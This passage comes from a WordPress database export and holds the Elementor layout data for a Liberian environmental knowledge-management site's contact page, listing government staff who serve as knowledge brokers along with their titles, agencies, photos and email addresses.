<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23934,3504,'_elementor_edit_mode','builder'),(23935,3504,'_elementor_template_type','wp-page'),(23936,3504,'_elementor_version','3.0.16'),(23937,3504,'_wp_page_template','default'),(23938,3504,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\"